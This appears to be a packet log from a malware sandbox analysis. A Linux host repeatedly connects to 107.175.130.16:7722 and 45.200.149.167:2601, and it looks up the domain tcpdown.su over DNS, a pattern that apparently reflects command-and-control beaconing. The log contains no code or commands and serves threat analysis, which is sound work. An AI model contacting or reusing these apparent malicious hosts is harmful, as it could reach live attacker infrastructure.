Jan 2, 2025 08:52:43.739792109 CET	43558	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:43.743890047 CET	7722	57138	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:43.744573116 CET	2601	43558	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:43.744611979 CET	43558	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:43.749375105 CET	2601	43558	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:43.786572933 CET	7722	57138	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:44.109371901 CET	7722	57138	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:44.109442949 CET	57138	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:44.572081089 CET	2601	43558	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:44.572194099 CET	43558	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:44.572194099 CET	43558	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:50.181684971 CET	57142	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.184990883 CET	57144	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.186455965 CET	7722	57142	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.186525106 CET	57142	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.186589003 CET	57142	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.186589003 CET	57142	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.189750910 CET	7722	57144	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.189807892 CET	57144	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.189825058 CET	57144	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.189837933 CET	57144	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.191378117 CET	7722	57142	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.194628954 CET	7722	57144	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.234558105 CET	7722	57142	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.238464117 CET	7722	57144	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.551224947 CET	7722	57142	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.551366091 CET	57142	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:50.574595928 CET	7722	57144	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:50.574696064 CET	57144	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:51.817378044 CET	43928	443	192.168.2.23	91.189.91.42
Jan 2, 2025 08:52:55.184919119 CET	57146	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:55.189749002 CET	7722	57146	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:55.189807892 CET	57146	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:55.189825058 CET	57146	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:55.189825058 CET	57146	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:55.194633961 CET	7722	57146	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:55.238522053 CET	7722	57146	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:55.581036091 CET	7722	57146	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:55.581156015 CET	57146	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:58.747076035 CET	57148	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:58.752053022 CET	7722	57148	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:58.752162933 CET	57148	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:58.752188921 CET	57148	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:58.752190113 CET	57148	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:58.758069038 CET	7722	57148	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:58.798502922 CET	7722	57148	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:59.139775038 CET	7722	57148	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:59.139890909 CET	57148	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.191450119 CET	57150	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.196197987 CET	7722	57150	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.196253061 CET	57150	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.197678089 CET	57150	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.197702885 CET	57150	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.202445030 CET	7722	57150	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.207158089 CET	57152	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.211962938 CET	7722	57152	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.212007999 CET	57152	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.212019920 CET	57152	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.212033033 CET	57152	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.216788054 CET	7722	57152	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.248848915 CET	7722	57150	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.258471012 CET	7722	57152	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.574728966 CET	7722	57150	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.574908972 CET	57150	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:00.599656105 CET	7722	57152	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:00.599709034 CET	57152	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.192826986 CET	57154	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.196410894 CET	57156	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.197774887 CET	7722	57154	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.197834969 CET	57154	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.198853016 CET	57154	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.198868036 CET	57154	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.201375008 CET	7722	57156	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.201450109 CET	57156	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.202862978 CET	57156	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.202862978 CET	57156	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.203655005 CET	7722	57154	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.207673073 CET	7722	57156	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.250509024 CET	7722	57154	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.250523090 CET	7722	57156	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.566401958 CET	7722	57154	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.566627979 CET	57154	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.569756031 CET	7722	57156	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:10.569827080 CET	57156	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:10.646833897 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:10.651707888 CET	2601	43576	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:10.651887894 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:10.651887894 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:10.656719923 CET	2601	43576	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:10.656788111 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:10.661606073 CET	2601	43576	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:12.612809896 CET	2601	43576	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:12.612917900 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:12.612958908 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:12.757700920 CET	2601	43576	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:12.757788897 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:12.757814884 CET	2601	43576	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:12.757857084 CET	43576	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:13.758866072 CET	57160	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:13.763803959 CET	7722	57160	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:13.763878107 CET	57160	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:13.763897896 CET	57160	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:13.763914108 CET	57160	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:13.768754005 CET	7722	57160	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:13.814420938 CET	7722	57160	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:14.128750086 CET	7722	57160	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:14.128825903 CET	57160	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.200620890 CET	57162	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.205440998 CET	57164	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.205823898 CET	7722	57162	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.205873013 CET	57162	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.205895901 CET	57162	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.205909967 CET	57162	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.210428953 CET	7722	57164	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.210474968 CET	57164	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.210503101 CET	57164	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.210503101 CET	57164	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.210921049 CET	7722	57162	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.215306997 CET	7722	57164	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.254508972 CET	7722	57162	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.262557983 CET	7722	57164	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.571286917 CET	7722	57162	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.571377993 CET	57162	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:20.572217941 CET	7722	57164	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:20.572280884 CET	57164	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.198154926 CET	57166	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.203110933 CET	7722	57166	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.203201056 CET	57166	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.203217030 CET	57166	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.203238964 CET	57166	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.208029032 CET	7722	57166	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.208064079 CET	57168	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.212888002 CET	7722	57168	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.212946892 CET	57168	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.214080095 CET	57168	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.214080095 CET	57168	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.218897104 CET	7722	57168	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.250483036 CET	7722	57166	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.262515068 CET	7722	57168	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.575939894 CET	7722	57166	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.576020002 CET	57166	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:25.579140902 CET	7722	57168	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:25.579231024 CET	57168	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.199817896 CET	57170	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.205969095 CET	57172	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.207082987 CET	7722	57170	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.207155943 CET	57170	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.207196951 CET	57170	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.207221031 CET	57170	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.214005947 CET	7722	57172	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.214039087 CET	7722	57170	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.214055061 CET	57172	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.214391947 CET	57172	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.214427948 CET	57172	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.219192982 CET	7722	57172	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.258461952 CET	7722	57170	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.428026915 CET	57172	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.466713905 CET	7722	57172	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.467547894 CET	7722	57172	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.596993923 CET	7722	57170	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.597229004 CET	57170	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:30.597378969 CET	7722	57172	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:30.597445011 CET	57172	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:38.682976007 CET	43592	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:38.688013077 CET	2601	43592	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:38.688102007 CET	43592	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:38.688154936 CET	43592	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:38.693161011 CET	2601	43592	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:38.693217039 CET	43592	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:38.697946072 CET	2601	43592	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:39.514400959 CET	2601	43592	45.200.149.167	192.168.2.23
Jan 2, 2025 08:53:39.514509916 CET	43592	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:39.514509916 CET	43592	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:53:40.195786953 CET	57176	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:40.200762987 CET	7722	57176	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:40.200834036 CET	57176	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:40.200850964 CET	57176	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:40.200850964 CET	57176	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:40.205710888 CET	7722	57176	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:40.246471882 CET	7722	57176	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:40.569274902 CET	7722	57176	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:40.569328070 CET	57176	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:43.781807899 CET	57178	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:43.786798954 CET	7722	57178	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:43.786866903 CET	57178	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:43.787177086 CET	57178	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:43.787193060 CET	57178	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:43.792015076 CET	7722	57178	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:43.834458113 CET	7722	57178	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:44.149998903 CET	7722	57178	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:44.150057077 CET	57178	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.197726011 CET	57180	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.202531099 CET	7722	57180	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.202603102 CET	57180	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.202603102 CET	57180	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.202620029 CET	57180	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.207485914 CET	7722	57180	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.208173037 CET	57182	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.212997913 CET	7722	57182	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.213052034 CET	57182	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.213068008 CET	57182	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.213082075 CET	57182	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.217916965 CET	7722	57182	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.250452995 CET	7722	57180	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.258459091 CET	7722	57182	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.575237036 CET	7722	57180	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.575342894 CET	57180	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:45.593533039 CET	7722	57182	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:45.593602896 CET	57182	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.206506968 CET	57184	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.211471081 CET	7722	57184	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.211543083 CET	57184	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.214092016 CET	57186	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.215349913 CET	57184	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.215349913 CET	57184	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.218899012 CET	7722	57186	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.218950987 CET	57186	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.220186949 CET	57186	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.220206976 CET	7722	57184	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.220207930 CET	57186	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.225063086 CET	7722	57186	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.262475014 CET	7722	57184	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.266525030 CET	7722	57186	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.585464954 CET	7722	57186	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.585572958 CET	57186	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:53:50.590924978 CET	7722	57184	107.175.130.16	192.168.2.23
Jan 2, 2025 08:53:50.591006994 CET	57184	7722	192.168.2.23	107.175.130.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 08:51:49.224452019 CET	59672	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:49.231483936 CET	53	59672	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:49.231595039 CET	46427	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:49.246720076 CET	53	46427	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:49.246792078 CET	37917	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:49.266180992 CET	53	37917	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:49.266294956 CET	38979	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:49.274998903 CET	53	38979	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:49.275053024 CET	53965	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:49.285022974 CET	53	53965	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:49.285108089 CET	33100	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:49.298796892 CET	53	33100	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:51.192943096 CET	45207	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:51.211858034 CET	53	45207	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:51.211940050 CET	33587	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:51.219177961 CET	53	33587	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:51.219244003 CET	55206	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:51.237888098 CET	53	55206	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:51.237967014 CET	39109	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:51.252182961 CET	53	39109	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:51.252259016 CET	47255	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:51.259376049 CET	53	47255	1.1.1.1	192.168.2.23
Jan 2, 2025 08:51:51.259471893 CET	36900	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:51:56.263854027 CET	57869	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:01.264430046 CET	39094	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:06.267746925 CET	42237	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:11.271043062 CET	45039	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:18.672060013 CET	53834	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:18.680730104 CET	53	53834	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:18.680954933 CET	53792	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:18.687820911 CET	53	53792	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:18.687928915 CET	47827	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:18.702533007 CET	53	47827	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:18.702635050 CET	36912	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:18.711811066 CET	53	36912	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:18.711895943 CET	59996	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:18.719135046 CET	53	59996	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:18.719265938 CET	33212	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:23.722882986 CET	39336	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:28.724591970 CET	39194	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:33.727926016 CET	51858	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:38.731221914 CET	52193	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:45.573040962 CET	58460	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:45.587977886 CET	53	58460	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:45.588066101 CET	36093	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:45.595063925 CET	53	36093	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:45.595118046 CET	38132	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:45.602387905 CET	53	38132	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:45.602444887 CET	47420	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:45.617456913 CET	53	47420	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:45.617518902 CET	35129	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:45.632076025 CET	53	35129	1.1.1.1	192.168.2.23
Jan 2, 2025 08:52:45.632164955 CET	45906	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:50.633805990 CET	41872	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:52:55.636940956 CET	35228	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:00.640242100 CET	44668	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:05.644213915 CET	54884	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:13.614108086 CET	41488	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:13.622845888 CET	53	41488	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:13.623044968 CET	39318	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:13.637629032 CET	53	39318	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:13.637710094 CET	44326	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:13.645045996 CET	53	44326	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:13.645109892 CET	41167	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:13.653752089 CET	53	41167	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:13.653831005 CET	50101	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:13.668256044 CET	53	50101	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:13.668344975 CET	51946	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:18.669735909 CET	52058	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:23.674225092 CET	42151	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:28.676347017 CET	36951	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:33.679683924 CET	43434	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:40.515492916 CET	58529	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:40.534445047 CET	53	58529	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:40.534512997 CET	53023	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:40.541518927 CET	53	53023	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:40.541649103 CET	44484	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:40.548779011 CET	53	44484	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:40.548872948 CET	41700	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:40.555852890 CET	53	41700	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:40.555959940 CET	53590	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:40.563196898 CET	53	53590	1.1.1.1	192.168.2.23
Jan 2, 2025 08:53:40.563287973 CET	43849	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:45.567794085 CET	48948	53	192.168.2.23	1.1.1.1
Jan 2, 2025 08:53:50.572230101 CET	57588	53	192.168.2.23	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 08:51:49.224452019 CET	192.168.2.23	1.1.1.1	0x5634	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.231595039 CET	192.168.2.23	1.1.1.1	0x3482	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.246792078 CET	192.168.2.23	1.1.1.1	0x3482	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.266294956 CET	192.168.2.23	1.1.1.1	0x3482	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.275053024 CET	192.168.2.23	1.1.1.1	0x3482	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.285108089 CET	192.168.2.23	1.1.1.1	0x3482	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.192943096 CET	192.168.2.23	1.1.1.1	0x5e07	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.211940050 CET	192.168.2.23	1.1.1.1	0x5e07	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.219244003 CET	192.168.2.23	1.1.1.1	0x5e07	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.237967014 CET	192.168.2.23	1.1.1.1	0x5e07	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.252259016 CET	192.168.2.23	1.1.1.1	0x5e07	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.259471893 CET	192.168.2.23	1.1.1.1	0x9b4f	Standard query (0)	tcpdown.su	0	256	false
